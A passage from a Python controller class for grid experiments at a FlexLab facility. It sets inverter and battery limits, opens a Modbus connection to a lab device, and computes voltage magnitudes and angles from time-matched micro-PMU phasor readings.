self.act_idxs + 1 #inverters indexed starting with 1 not 0\n\n #Flexlab specific commands\n self.currentMeasExists = currentMeasExists\n self.loadrackPlimit = 2000. #size of a load rack in VA\n self.loadrack_manuallimit = 1500.\n self.batt_max = 3300.\n self.inv_s_max = 7600. * 0.90 # 0.97 comes from the fact that we are limiting our inverter max to 97% of its true max to prevent issues with running inverter at full power\n self.inv_s_max_commands = 8350.\n self.mode = 1 #How we control inverters mode 1: PV as disturbance, mode 2: PV calculated, mode 3: PV only\n self.batt_cmd = np.zeros(nphases) #battery commands are given in watts\n self.invPperc_ctrl = np.zeros(nphases) #inverter P commnads are given as a percentage of inv_s_max\n self.load_cmd = np.zeros(nphases) #load commands are given in watts\n self.P_PV = np.zeros(nphases)\n self.pf_ctrl = np.ones(nphases)\n # self.flexgrid = Flexgrid_API(inv_ids=[1, 2, 3], portNames=['COM3'], baudrate=115200, parallel=False, safety=True,\n # debug=False, ComClient=ModbusRTUClient)\n self.inv_Pmax = 7000 #check with Maxime\n self.inv_Qmax = 5000 #check with Maxime\n self.offset_mode = 2 # set to 1 for remainder offset, 2 for percentage offset, 0 for no offset\n\n IP = '131.243.41.14'\n PORT = 504\n self.client = ModbusClient(IP, port=PORT)\n\n self.VmagScaling = VmagScaling #this is a hack to get flexlab to work. default to 1\n\n #vars for plots\n self.controlStepsTaken_counter = 0\n self.testcase = cfg['testcase']\n self.saveVmagandangPlot = 1\n self.saveZesterrorPlot = 1\n # self.HistLength = 101\n # self.HistLength = 10\n self.HistLength = 3\n self.VmagHist = np.zeros((self.nphases,self.HistLength))\n self.VangHist = np.zeros((self.nphases,self.HistLength))\n self.ZeffkErrorHist = np.zeros(self.HistLength)\n self.GtMagHist = np.zeros(self.HistLength)\n\n self.P_implemented_PU = None #to account for commands hitting the upper limits of an actuator\n self.Q_implemented_PU = None\n\n self.AveragePhasorMeasurements = 1 # =1: Take the average phasor meas, =0: take the most recent\n\n\n def phasorV_localMeas(self, local_phasors, nphases, plug_to_V_idx):\n '''\n This only works if the network is at the same frequency for which the phasors are defined\n '''\n # Initialize\n #ordered_local is the PMU meas data sets from the local PMU. First dim is phase, second is dataWindowLength.\n # ordered_local = [None] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n ordered_local = [0] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n flag = [1] * nphases #used to check if a delta angle was found\n Vmeas_all_phases = 1\n # Extract latest nPhasorReadings readings from local and ref uPMUs, and put local in phase-order (ref is assumed to be in phase-order)\n for plug in range(nphases): #this will just read the voltage measurements cause its nphases long, even if local_phasors also has current measurements\n if len(local_phasors[plug]) > self.nPhasorReadings:\n dataWindowLength = self.nPhasorReadings\n else:\n dataWindowLength = len(local_phasors[plug])\n phase_idx = plug_to_V_idx[plug]\n ordered_local[phase_idx] = local_phasors[plug][-dataWindowLength:] #this orders local in A,B,C phase order (ref is assumed ot be in A,B,C order)\n\n Vmag = np.asarray([np.NaN]*nphases)\n Vang = np.asarray([np.NaN]*nphases)\n Vfreq = np.asarray([np.NaN]*nphases)\n\n VmagSum = np.zeros(nphases)\n VangSum = np.zeros(nphases)\n VfreqSum = np.zeros(nphases)\n\n VmagCount = np.zeros(nphases)\n VangCount = np.zeros(nphases)\n VfreqCount = np.zeros(nphases)\n\n for phase in range(nphases):\n # loops through every ordered_local uPMU reading\n for local_packet in ordered_local[phase]:\n Vmagi = local_packet['magnitude']\n Vmagi = Vmagi * self.VmagScaling\n if Vmagi is None:\n print('Vmagi is None')\n elif np.isnan(Vmagi):\n print('Vmagi is NaN')\n elif Vmagi == 0:\n print('Vmagi is 0')\n else:\n VmagSum[phase] += Vmagi\n VmagCount[phase] += 1\n\n Vangi = local_packet['angle']\n if Vangi is None:\n print('Vangi is None')\n elif np.isnan(Vangi):\n print('Vangi is NaN')\n elif Vangi == 0:\n print('Vangi is 0')\n else:\n Vangi = np.radians(Vangi)\n VangSum[phase] += self.PhasorV_ang_wraparound(Vangi, nphases=1, nameVang='Vangi')\n VangCount[phase] += 1\n # flag[phase] = 0\n\n Vfreqi = local_packet['freq']\n if Vfreqi is None or np.isnan(Vfreqi):\n print('Vfreqi is Not good')\n else:\n VfreqSum[phase] += Vfreqi\n VfreqCount[phase] += 1\n\n Vmag[phase] = VmagSum[phase]/VmagCount[phase]\n Vang[phase] = VangSum[phase]/VangCount[phase]\n Vfreq[phase] = VfreqSum[phase]/VfreqCount[phase]\n\n # if flag[phase] == 1:\n # print('No timestamp found bus ' + str(self.busId) + ' phase ' + str(phase))\n # Vmeas_all_phases = 0\n if all(abs(Vfreq - self.nomFreq) < self.freqTol): #HEREE\n deltaVangReliable = 1 #this isnt necessarily true, eg there could have been a frequency excursion before the data window started\n else:\n deltaVangReliable = 0\n print(';;;;;;;;;;;;;;!!!!!!!! deltaVangReliable not reliable bc Vfreq = ', Vfreq)\n print('self.freqTol ', self.freqTol)\n\n print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n print('len(local_phasors[plug]) ', len(local_phasors[plug])) #this is the number of phasor measurements delivered. often it is 120*rate (number of seconds)\n\n print('VmagCount ', VmagCount)\n print('Vmag ', Vmag)\n\n print('VangCount ', VangCount)\n print('Vang ', Vang)\n\n print('Vfreq ', Vfreq)\n print('deltaVangReliable ', deltaVangReliable)\n print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n\n return Vang, Vmag, dataWindowLength, deltaVangReliable\n\n\n # def phasorV_localMeas(self, local_phasors, nphases, plug_to_V_idx):\n # '''\n # This isnt going to work because the delta angle needs to be between before the change in actuation and after the change in actuation (CIA).\n # Its possible to do it with screens to find when the CIA happened, then take the phasor before the CIA and find a phasor for after the jump\n # Finding a phasor for after the CIA could be a single phasor after the jump, or an average of phasors after the jump.\n # The phasors after the jump have to take into account the accumulated affect of the off-nominal frequency\n # '''\n # # Initialize\n # #ordered_local is the PMU meas data sets from the local PMU. First dim is phase, second is dataWindowLength.\n # # ordered_local = [None] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n # ordered_local = [0] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n # flag = [1] * nphases #used to check if a delta angle was found\n # Vmeas_all_phases = 1\n # # Extract latest nPhasorReadings readings from local and ref uPMUs, and put local in phase-order (ref is assumed to be in phase-order)\n # for plug in range(nphases): #this will just read the voltage measurements cause its nphases long, even if local_phasors also has current measurements\n # if len(local_phasors[plug]) > self.nPhasorReadings:\n # dataWindowLength = self.nPhasorReadings\n # else:\n # dataWindowLength = len(local_phasors[plug])\n # phase_idx = plug_to_V_idx[plug]\n # ordered_local[phase_idx] = local_phasors[plug][-dataWindowLength:] #this orders local in A,B,C phase order (ref is assumed ot be in A,B,C order)\n #\n # Vmag = np.asarray([np.NaN]*nphases)\n # deltaVang_compensated = np.asarray([np.NaN]*nphases)\n # deltaVang_uncompensated = np.asarray([np.NaN]*nphases)\n #\n # VmagSum = np.zeros(nphases)\n # VmagCount = np.zeros(nphases)\n # deltaVangCount = np.zeros(nphases)\n # deltaVang_compensated_Sum = np.zeros(nphases)\n # deltaVang_uncompensated_Sum = np.zeros(nphases)\n #\n # # first = [1] * nphases #used to init delta_Vang calc\n # VangPrev = [None] * nphases\n #\n # for phase in range(nphases):\n # # loops through every ordered_local uPMU reading\n # for local_packet in ordered_local[phase]:\n # Vmagi = local_packet['magnitude']\n # Vmagi = Vmagi * self.VmagScaling\n # if Vmagi is None:\n # print('Vmagi is None')\n # elif np.isnan(Vmagi):\n # print('Vmagi is NaN')\n # elif Vmagi == 0:\n # print('Vmagi is 0')\n # else:\n # VmagSum[phase] += Vmagi\n # VmagCount[phase] += 1\n #\n # Vangi = local_packet['angle']\n # Vfreqi = local_packet['freq']\n # if VangPrev[phase] is None:\n # print(f'VangPrev[{phase}] was None')\n # VangPrev[phase] = Vangi\n # print(f'VangPrev[{phase}] is {VangPrev[phase]} now')\n # else:\n # deltaVangCount += 1\n # deltaVangi_freqCompensation = (Vfreqi/self.nomFreq - 1)*2*np.pi/(self.measurementFreq/self.nomFreq)\n # deltaVangi_compensated = Vangi - deltaVangi_freqCompensation - VangPrev[phase] #HEREE\n # deltaVangi_compensated = self.PhasorV_ang_wraparound(deltaVangi_compensated, nphases=1, nameVang='deltaVangi_compensated')\n # deltaVang_compensated_Sum[phase] += deltaVangi_compensated\n # deltaVangi_uncompensated = Vangi - VangPrev[phase]\n # deltaVangi_uncompensated = self.PhasorV_ang_wraparound(deltaVangi_uncompensated, nphases=1, nameVang='deltaVangi_uncompensated')\n # deltaVang_uncompensated_Sum[phase] += deltaVangi_uncompensated\n # flag[phase] = 0\n #\n # Vmag[phase] = VmagSum[phase]/VmagCount[phase]\n #\n # if flag[phase] == 1:\n # print('No timestamp found bus ' + str(self.busId) + ' phase ' + str(phase))\n # Vmeas_all_phases = 0\n # else:\n # deltaVang_compensated[phase] = deltaVang_compensated_Sum[phase]/deltaVangCount[phase]\n # deltaVang_uncompensated[phase] = deltaVang_uncompensated_Sum[phase]/deltaVangCount[phase]\n #\n # print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n # print('len(local_phasors[plug]) ', len(local_phasors[plug])) #this is the number of phasor measurements delivered. often it is 120*rate (number of seconds)\n #\n # print('VmagCount ', VmagCount)\n # print('Vmag ', Vmag)\n #\n # print('deltaVangCount ', deltaVangCount)\n # print('deltaVang_compensated ', deltaVang_compensated)\n # print('deltaVang_uncompensated ', deltaVang_uncompensated)\n #\n # print('Vfreqi ', Vfreqi) #may want to print these for more timesteps or each phase if something is weird\n # print('deltaVangi_freqCompensation ', deltaVangi_freqCompensation)\n # print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n #\n # return deltaVang_compensated, deltaVang_uncompensated, Vmag, dataWindowLength, Vmeas_all_phases\n\n '''\n Think this is how the PMUs send data:\n Each PMU measurement comes with a time stamp and an angle measurement.\n The timestamps have to be aligned before the angle difference is taken\n The angle measurement that comes from the PMU has an arbitrary refernce. To get meaningful angle measurements, you have to decide on a reference.\n (Still deciding whether the arbitrary is the first phase for a given controller. Could make it always phase A, but reference_phasors would always have to contain phase A.)\n V_ang_ref_firstPhase is special because it is chosen as angle = 0, and subtracted (sometimes implicitly) from all other angles.\n self.Vang_with120degshifts is named poorly (by me), just means that V_ang_ref_firstPhase is subtracted, rather than V_ang_ref[phase], so the angles will be relative to [0,0,0] rather than [0,-120,120]\n '''\n '''\n HERE\n create buffers for local and ref phasor measurements that have n_buffer measurements in them:\n self.ref_local_buffer\n each time a new meas comes in, you delete the oldest phasor measurements from the buffer and put in the newest phasor measurements\n for each new local measurement, you check all the meassurements in self.ref_local_buffer, rather than just in ref_local.\n Actually, it should be the other way around bc the ref measurements are the ones that are going to be delayed. So instead there should be:\n self.ordered_local_buffer\n Each time a ref measurement comes in, all of the measurements in self.ordered_local_buffer are checked for time-matches\n (This will require switchign the order of the for loops in phasorV_calc)\n (Same would have to be implemented in PhasorIcalc)\n '''\n def phasorV_calc(self, local_phasors, reference_phasors, nphases, plug_to_V_idx):\n # Initialize\n #ordered_local and ref are the PMU meas data sets from the local and ref PMUs, respectively. First dim is phase, second is dataWindowLength.\n # ordered_local = [None] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n # ref = [None] * nphases\n ordered_local = [0] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n ref = [0] * nphases\n flag = [1] * nphases #used to check if a phasor match was found\n Vmeas_all_phases = 1\n # Extract latest nPhasorReadings readings from local and ref uPMUs, and put local in phase-order (ref is assumed to be in phase-order)\n for plug in range(nphases): #this will just read the voltage measurements cause its nphases long, even if local_phasors also has current measurements\n if len(local_phasors[plug]) > self.nPhasorReadings:\n dataWindowLength = self.nPhasorReadings\n else:\n dataWindowLength = len(local_phasors[plug])\n phase_idx = plug_to_V_idx[plug]\n ordered_local[phase_idx] = local_phasors[plug][-dataWindowLength:] #this orders local in A,B,C phase order (ref is assumed ot be in A,B,C order)\n ref[plug] = reference_phasors[plug][-dataWindowLength:] #from dataWindowLength back to present, puts Lx2 entries in each entry of local, x2 is for magnitude and phase\n\n Vmag = np.asarray([np.NaN]*nphases)\n VmagRef = np.asarray([np.NaN]*nphases)\n Vmag_relative = np.asarray([np.NaN]*nphases)\n\n VmagSum = np.zeros(nphases)\n VmagCount = np.zeros(nphases)\n VmagRefSum = np.zeros(nphases)\n VmagRefCount = np.zeros(nphases)\n for phase in range(nphases):\n # loops through every ordered_local uPMU reading\n for local_packet in ordered_local[phase]:\n Vmagi = local_packet['magnitude']\n Vmagi = Vmagi * self.VmagScaling\n if Vmagi is None:\n print('Vmagi is None')\n elif np.isnan(Vmagi):\n print('Vmagi is NaN')\n elif Vmagi == 0:\n print('Vmagi is 0')\n else:\n VmagSum[phase] += Vmagi\n VmagCount[phase] += 1\n for ref_packet in ref[phase]:\n VmagRefi = ref_packet['magnitude']\n VmagRefi = VmagRefi * self.VmagScaling\n if VmagRefi is None:\n print('VmagRefi is None')\n elif np.isnan(VmagRefi):\n print('VmagRefi is NaN')\n elif VmagRefi == 0:\n print('VmagRefi is 0')\n else:\n VmagRefSum[phase] += VmagRefi\n VmagRefCount[phase] += 1\n Vmag[phase] = VmagSum[phase]/VmagCount[phase]\n VmagRef[phase] = VmagRefSum[phase]/VmagRefCount[phase]\n Vmag_relative[phase] = Vmag[phase] - VmagRef[phase]\n\n # print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n print('len(local_phasors[plug]) ', len(local_phasors[plug])) #this is the number of phasor measurements delivered. often it is 120*rate (number of seconds)\n print('len(reference_phasors[plug]) ', len(reference_phasors[plug]))\n #\n # print('ordered_local[0][0][time] - ordered_local[0][-1][time] ', int(ordered_local[0][0]['time']) - int(ordered_local[0][-1]['time']))\n # print('ref[0][0][time] - ref[0][-1][time] ', int(ref[0][0]['time']) - int(ref[0][-1]['time']))\n\n print('VmagCount ', VmagCount)\n # print('VmagRefCount ', VmagRefCount)\n # print('Vmag ', Vmag)\n # print('VmagRef ', VmagRef)\n # print('Vmag_relative ', Vmag_relative)\n # print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n\n local_time_index = [np.NaN]*nphases\n ref_time_index = [np.NaN]*nphases\n\n Vang_with120degshifts = np.asarray([np.NaN]*nphases)\n Vang_without120degshifts = np.asarray([np.NaN]*nphases)\n VangRef = np.asarray([np.NaN]*nphases)\n # V_ang_ref_firstPhase = [np.NaN]\n V_ang_ref_firstPhase = np.asarray([np.NaN]*nphases) #using nphase-long version for back-compatibility, they should all be the same\n\n VangCount = np.zeros(nphases)\n Vang_with120degshifts_Sum = np.zeros(nphases)\n # Vang_with120degshifts_Count = np.zeros(nphases)\n Vang_without120degshifts_Sum = np.zeros(nphases)\n # Vang_without120degshifts_Count = np.zeros(nphases)\n VangRef_Sum = np.zeros(nphases)\n # VangRefCount = np.zeros(nphases)\n V_ang_ref_firstPhase_Sum = np.zeros(nphases)\n # V_ang_ref_firstPhaseCount = np.zeros(nphases)\n\n #5/28/20 sets the first phase as the local base angle timestamp even if this phase is B or C\n #this is okay bc the local controller can just use 0 for its first angle (locally), even if that angle is phase is B or C\n #important thing is that the other notRelative angles are seperated by ~120degrees\n for phase in range(nphases):\n refAngleUsedVec = np.zeros(dataWindowLength) # debug to check if any refs are used twice (they shouldnt be)\n # loops through every ordered_local uPMU reading starting from most recent\n for local_packet in reversed(ordered_local[phase]): #doesnt need ot be reversed when using averaging (as done now), but doesnt hurt\n # extract most recent ordered_local uPMU reading\n local_time = int(local_packet['time'])\n # loops though every reference uPMU reading starting from most recent\n i = 0\n for ref_packet in reversed(ref[phase]):\n ref_time = int(ref_packet['time'])\n\n # check timestamps of ordered_local and reference uPMU if within 2 ms\n if abs(ref_time - local_time) <= self.pmuTimeWindow:\n local_time_index[phase] = ordered_local[phase].index(local_packet) #saves and returns these so the current measurement can use the measurements from the same timestamps\n ref_time_index[phase] = ref[phase].index(ref_packet)\n # Extract measurements from closest timestamps\n V_ang_local = ordered_local[phase][local_time_index[phase]]['angle'] - self.ametek_phase_shift\n V_ang_ref = ref[phase][ref_time_index[phase]]['angle']\n V_ang_ref_firstPhaseTemp = ref[0][ref_time_index[phase]]['angle']\n #dont think you actually need/want PhasorV_ang_wraparound_1d\n # V_ang_local = self.PhasorV_ang_wraparound_1d(ordered_local[phase][local_time_index[phase]]['angle'] - self.ametek_phase_shift)\n # V_ang_ref = self.PhasorV_ang_wraparound_1d(ref[phase][ref_time_index[phase]]['angle'])\n # V_ang_ref_firstPhaseTemp = self.PhasorV_ang_wraparound_1d(ref[0][ref_time_index[phase]]['angle'])\n\n # V_ang_ref_firstPhase = ref[0][ref_time_index[phase]]['angle'] #this can be thought of as the local base angle timestamp\n # if V_ang_ref_firstPhase == np.NaN or V_ang_ref_firstPhase == None: #(could put in a better check here, eg is the angle in a reasonable range)\n V_ang_ref_firstPhase_Sum [phase] += V_ang_ref_firstPhaseTemp #because each phase (of the current meas) needs a V_ang_ref_firstPhase\n if V_ang_ref_firstPhaseTemp == np.NaN or V_ang_ref_firstPhaseTemp == None: #(could put in a better check here, eg is the angle in a reasonable range)\n print('WARNING: issue getting a nonRelative voltage angle. This will mess up the LQR controller.')\n\n Vang_without120degshifts_Sum[phase] += np.radians(V_ang_local - V_ang_ref)\n Vang_with120degshifts_Sum[phase] += np.radians(V_ang_local - V_ang_ref_firstPhaseTemp)\n VangRef_Sum[phase] += np.radians(V_ang_ref - V_ang_ref_firstPhaseTemp)\n VangCount[phase] += 1\n if refAngleUsedVec[i] == 1 and phase == 0: #debug\n print(f'WARNING, this ref angle {i} was already used')\n refAngleUsedVec[i] = 1\n\n flag[phase] = 0\n #for debugging\n # if phase == 0:\n # print('i used ', i)\n # print(f'ref,local,diff: {ref_time},{local_time},{(ref_time-local_time)/1e6}')\n # break # dont want this break when doing averaging\n\n i += 1\n # if flag[phase] == 0:\n # break\n if flag[phase] == 1:\n print('No timestamp found bus ' + str(self.busId) + ' phase ' + str(phase))\n Vmeas_all_phases = 0\n else:\n Vang_with120degshifts[phase] = Vang_with120degshifts_Sum[phase]/VangCount[phase]\n Vang_without120degshifts[phase] = Vang_without120degshifts_Sum[phase]/VangCount[phase]\n VangRef[phase] = VangRef_Sum[phase]/VangCount[phase]\n V_ang_ref_firstPhase[phase] = V_ang_ref_firstPhase_Sum [phase]/VangCount[phase]\n\n # print('Vang_with120degshifts ', Vang_with120degshifts)\n # print('Vang_without120degshifts ', Vang_without120degshifts)\n # print('VangRef ', VangRef)\n # print('V_ang_ref_firstPhase ', V_ang_ref_firstPhase)\n print('VangCount ', VangCount)\n # print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n return (Vang_with120degshifts,VangRef,Vang_without120degshifts,Vmag,VmagRef,Vmag_relative, V_ang_ref_firstPhase, dataWindowLength, Vmeas_all_phases) #returns the self. variables bc in case a match isnt found, they're already initialized\n\n\n # older version that didnt take average of angles\n def old_phasorV_calc(self, local_phasors, reference_phasors, nphases, plug_to_V_idx):\n # Initialize\n #ordered_local and ref are the PMU meas data sets from the local and ref PMUs, respectively. First dim is phase, second is dataWindowLength.\n # ordered_local = [None] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n # ref = [None] * nphases\n ordered_local = [0] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n ref = [0] * nphases\n flag = [1] * nphases #used to check if a phasor match was found\n Vmeas_all_phases = 1\n # Extract latest nPhasorReadings readings from local and ref uPMUs, and put local in phase-order (ref is assumed to be in phase-order)\n for plug in range(nphases): #this will just read the voltage measurements cause its nphases long, even if local_phasors also has current measurements\n if len(local_phasors[plug]) > self.nPhasorReadings:\n dataWindowLength = self.nPhasorReadings\n else:\n dataWindowLength = len(local_phasors[plug])\n phase_idx = plug_to_V_idx[plug]\n ordered_local[phase_idx] = local_phasors[plug][-dataWindowLength:] #this orders local in A,B,C phase order (ref is assumed ot be in A,B,C order)\n ref[plug] = reference_phasors[plug][-dataWindowLength:] #from dataWindowLength back to present, puts Lx2 entries in each entry of local, x2 is for magnitude and phase\n #HERE small chance theres a problem here w copying a mutable data type and not using .copy()\n\n #this was creating issues when intitial phasor reading wasnt correct\n # if self.Vang_without120degshifts == 'initialize':\n # self.Vang_without120degshifts = np.zeros(nphases)\n # # loops through every phase with actuation\n # for phase in range(nphases): #phases descrived by a,b,c ordering, but not necessarily a,b,c, all angles are base zero (ie not base -2pi/3 for phase B) bec they are relative angles\n # # Initialize: Extract measurements from most recent timestamps only for first iteration\n # V_mag_local = ordered_local[phase][-1]['magnitude']\n # V_ang_local = ordered_local[phase][-1]['angle'] - self.ametek_phase_shift\n # V_mag_ref = ref[phase][-1]['magnitude']\n # V_ang_ref = ref[phase][-1]['angle']\n # self.Vang_without120degshifts[phase] = np.radians(V_ang_local - V_ang_ref)\n # self.Vmag[phase] = V_mag_local\n # self.VmagRef[phase] = V_mag_ref\n # self.Vmag_relative[phase] = V_mag_local - V_mag_ref\n\n Vmag = np.asarray([np.NaN]*nphases)\n VmagRef = np.asarray([np.NaN]*nphases)\n Vmag_relative = np.asarray([np.NaN]*nphases)\n\n VmagSum = np.zeros(nphases)\n VmagCount = np.zeros(nphases)\n VmagRefSum = np.zeros(nphases)\n VmagRefCount = np.zeros(nphases)\n for phase in range(nphases):\n # loops through every ordered_local uPMU reading\n for local_packet in ordered_local[phase]:\n Vmagi = local_packet['magnitude']\n Vmagi = Vmagi * self.VmagScaling\n if Vmagi is None:\n print('Vmagi is None')\n elif np.isnan(Vmagi):\n print('Vmagi is NaN')\n elif Vmagi == 0:\n print('Vmagi is 0')\n else:\n VmagSum[phase] += Vmagi\n VmagCount[phase] += 1\n for ref_packet in ref[phase]:\n VmagRefi = ref_packet['magnitude']\n VmagRefi = VmagRefi * self.VmagScaling\n if VmagRefi is None:\n print('VmagRefi is None')\n elif np.isnan(VmagRefi):\n print('VmagRefi is NaN')\n elif VmagRefi == 0:\n print('VmagRefi is 0')\n else:\n VmagRefSum[phase] += VmagRefi\n VmagRefCount[phase] += 1\n Vmag[phase] = VmagSum[phase]/VmagCount[phase]\n VmagRef[phase] = VmagRefSum[phase]/VmagRefCount[phase]\n Vmag_relative[phase] = Vmag[phase] - VmagRef[phase]\n\n # loops through each set of voltage measurements for each phase\n local_time_index = [np.NaN]*nphases\n ref_time_index = [np.NaN]*nphases\n #below isnt needed if you switch back to using self. values\n Vang_with120degshifts = np.asarray([np.NaN]*nphases)\n VangRef = np.asarray([np.NaN]*nphases)\n Vang_without120degshifts = np.asarray([np.NaN]*nphases)\n # Vmag = np.asarray([np.NaN]*nphases)\n # VmagRef = np.asarray([np.NaN]*nphases)\n # Vmag_relative = np.asarray([np.NaN]*nphases)\n\n # V_ang_ref_firstPhase = [np.NaN]\n V_ang_ref_firstPhase = [np.NaN]*nphases #using this for back-compatibility\n\n #5/28/20 sets the first phase as the local base angle timestamp even if this phase is B or C\n #this is okay bc the local controller can just use 0 for its first angle (locally), even if that angle is phase is B or C\n #important thing is that the other notRelative angles are seperated by ~120degrees\n for phase in range(nphases):\n # loops through every ordered_local uPMU reading starting from most recent\n for local_packet in reversed(ordered_local[phase]):\n # extract most recent ordered_local uPMU reading\n local_time = int(local_packet['time'])\n # loops though every reference uPMU reading starting from most recent\n for ref_packet in reversed(ref[phase]):\n ref_time = int(ref_packet['time'])\n\n #print(f'ref,local,diff: {ref_time},{local_time},{(ref_time-local_time)/1e6}')\n\n # check timestamps of ordered_local and reference uPMU if within 2 ms\n if abs(ref_time - local_time) <= self.pmuTimeWindow:\n local_time_index[phase] = ordered_local[phase].index(local_packet) #saves and returns these so the current measurement can use the measurements from the same timestamps\n ref_time_index[phase] = ref[phase].index(ref_packet)\n # Extract measurements from closest timestamps\n # V_mag_local = ordered_local[phase][local_time_index[phase]]['magnitude']\n # V_mag_ref = ref[phase][ref_time_index[phase]]['magnitude']\n # Vmag[phase] = V_mag_local\n # VmagRef[phase] = V_mag_ref\n # Vmag_relative[phase] = V_mag_local - V_mag_ref\n\n V_ang_local = ordered_local[phase][local_time_index[phase]]['angle'] - self.ametek_phase_shift\n V_ang_ref = ref[phase][ref_time_index[phase]]['angle']\n # V_ang_ref_firstPhase = ref[0][ref_time_index[phase]]['angle'] #this can be thought of as the local base angle timestamp\n V_ang_ref_firstPhase[phase] = ref[0][ref_time_index[phase]]['angle'] #because each phase (of the current meas) needs a V_ang_ref_firstPhase\n if V_ang_ref_firstPhase == np.NaN or V_ang_ref_firstPhase == None: #(could put in a better check here, eg is the angle in a reasonable range)\n print('WARNING: issue getting a nonRelative voltage angle. This will mess up the LQR controller.')\n\n Vang_without120degshifts[phase] = np.radians(V_ang_local - V_ang_ref)\n Vang_with120degshifts[phase] = np.radians(V_ang_local - V_ang_ref_firstPhase[phase])\n VangRef[phase] = np.radians(V_ang_ref - V_ang_ref_firstPhase[phase])\n # Vang_with120degshifts[phase] = np.radians(V_ang_local - V_ang_ref_firstPhase)\n # VangRef[phase] = np.radians(V_ang_ref - V_ang_ref_firstPhase)\n flag[phase] = 0\n break\n if flag[phase] == 0:\n break\n if flag[phase] == 1:\n print('No timestamp found bus ' + str(self.busId) + ' phase ' + str(phase))\n Vmeas_all_phases = 0\n return (Vang_with120degshifts,VangRef,Vang_without120degshifts,Vmag,VmagRef,Vmag_relative, local_time_index, ref_time_index, V_ang_ref_firstPhase, dataWindowLength, Vmeas_all_phases) #returns the self. variables bc in case a match isnt found, they're already initialized\n\n # #alternative to find a timestamp at which all voltages are aligned, rather than finding presumably different time steps for each phase\n # #decided not to implement this bc its less flexible than the option above, which appears to be working well at the moment\n # # loops through every ordered_local uPMU reading starting from most recent\n # #each of these would work, I think\n # # for local_packet in reversed(ordered_local[phase]): then i = ordered_local[phase].index(local_packet)\n # # for i, local_packet in reversed(list(enumerate(ordered_local[phase]))):\n # for i in reversed(range(len(ordered_local[0]))):\n # # extract most recent ordered_local uPMU reading\n # for phase in range(nphases):\n # local_time[phase] = int(ordered_local[phase][i]['time'])\n # # loops though every reference uPMU reading starting from most recent\n # # for ref_packet in reversed(ref[phase]):\n # if nphases > 1 and (local_time[0] != local_time[1]):\n # print('WARNING local phase times not matching up')\n # if nphases > 2 and (local_time[1] != local_time[2]):\n # print('WARNING local phase times not matching up')\n # for i in reversed(range(len(ref[0]))):\n # for phase in range(nphases):\n # ref_time[phase] = int(ref[phase][i]['time'])\n # if nphases > 1 and (ref_time[0] != ref_time[1]):\n # print('WARNING ref phase times not matching up')\n # if nphases > 2 and (ref_time[1] != ref_time[2]):\n # print('WARNING ref phase times not matching up')\n #\n # #print(f'ref,local,diff: {ref_time},{local_time},{(ref_time-local_time)/1e6}')\n #\n # # check timestamps of ordered_local and reference uPMU if within 2 ms\n # # if abs(ref_time - local_time) <= self.pmuTimeWindow:\n # # local_time_index[phase] = ordered_local[phase].index(local_packet) #saves and returns these so the current measurement can use the measurements from the same timestamps\n # # ref_time_index[phase] = ref[phase].index(ref_packet)\n # if all(abs(ref_time - local_time) <= self.pmuTimeWindow):\n # #dont need seperate time indeces for this verion, which checks that all time indeces are lined up for the given time, but leaving in for back-compatibility\n # for phase in range(nphases):\n # local_time_index[phase] = local_time[phase] #saves and returns these so the current measurement can use the measurements from the same timestamps\n # ref_time_index[phase] = ref_time[phase]\n # # Extract measurements from closest timestamps\n # V_mag_local = ordered_local[phase][local_time_index[phase]]['magnitude']\n # V_ang_local = ordered_local[phase][local_time_index[phase]]['angle'] - self.ametek_phase_shift\n # V_mag_ref = ref[phase][ref_time_index[phase]]['magnitude']\n # V_ang_ref = ref[phase][ref_time_index[phase]]['angle']\n # # V_ang_ref_firstPhase = ref[0][ref_time_index[phase]]['angle'] #this can be thought of as the local base angle timestamp\n # V_ang_ref_firstPhase[phase] = ref[0][ref_time_index[phase]]['angle'] #for back-compatibility (all phases)\n # if V_ang_ref_firstPhase == np.NaN or V_ang_ref_firstPhase == None: #(could put in a better check here, eg is the angle in a reasonable range)\n # print('WARNING: issue getting a nonRelative voltage angle. This will mess up the LQR controller.')\n #\n # # calculates relative phasors\n # # self.Vang_without120degshifts[phase] = np.radians(V_ang_local - V_ang_ref)\n # # self.Vmag[phase] = V_mag_local\n # # self.VmagRef[phase] = V_mag_ref\n # # self.Vmag_relative[phase] = V_mag_local - V_mag_ref\n # # self.Vang_with120degshifts[phase] = np.radians(V_ang_local - V_ang_ref_firstPhase[phase])\n # # self.VangRef[phase] = np.radians(V_ang_ref - V_ang_ref_firstPhase[phase]) #this is the angle that, when added to self.Vang_without120degshifts, gives self.Vang_with120degshifts. Will always be zero for the first phase, and close to [0, -120, 120] for a 3 phase node.\n # # # self.Vang_with120degshifts[phase] = np.radians(V_ang_local - V_ang_ref_firstPhase)\n # # # self.VangRef[phase] = np.radians(V_ang_ref - V_ang_ref_firstPhase)\n # #uncomment above and change the return statement if you want the default to be to use the previous V measurment when V measurements are not successfully calculated for each phase\n # Vang_without120degshifts[phase] = np.radians(V_ang_local - V_ang_ref)\n # Vmag[phase] = V_mag_local\n # VmagRef[phase] = V_mag_ref\n # Vmag_relative[phase] = V_mag_local - V_mag_ref\n # Vang_with120degshifts[phase] = np.radians(V_ang_local - V_ang_ref_firstPhase[phase])\n # VangRef[phase] = np.radians(V_ang_ref - V_ang_ref_firstPhase[phase])\n # # Vang_with120degshifts[phase] = np.radians(V_ang_local - V_ang_ref_firstPhase)\n # # VangRef[phase] = np.radians(V_ang_ref - V_ang_ref_firstPhase)\n # flag = 0\n # break\n # if flag == 0:\n # break\n # if flag == 1:\n # print('No timestamp found bus ' + str(self.busId) + ' phase ' + str(phase))\n # Vmeas_all_phases = 0\n # #self. vars are assigned and returned so that if a match isnt found, it returns the previous match\n # # return 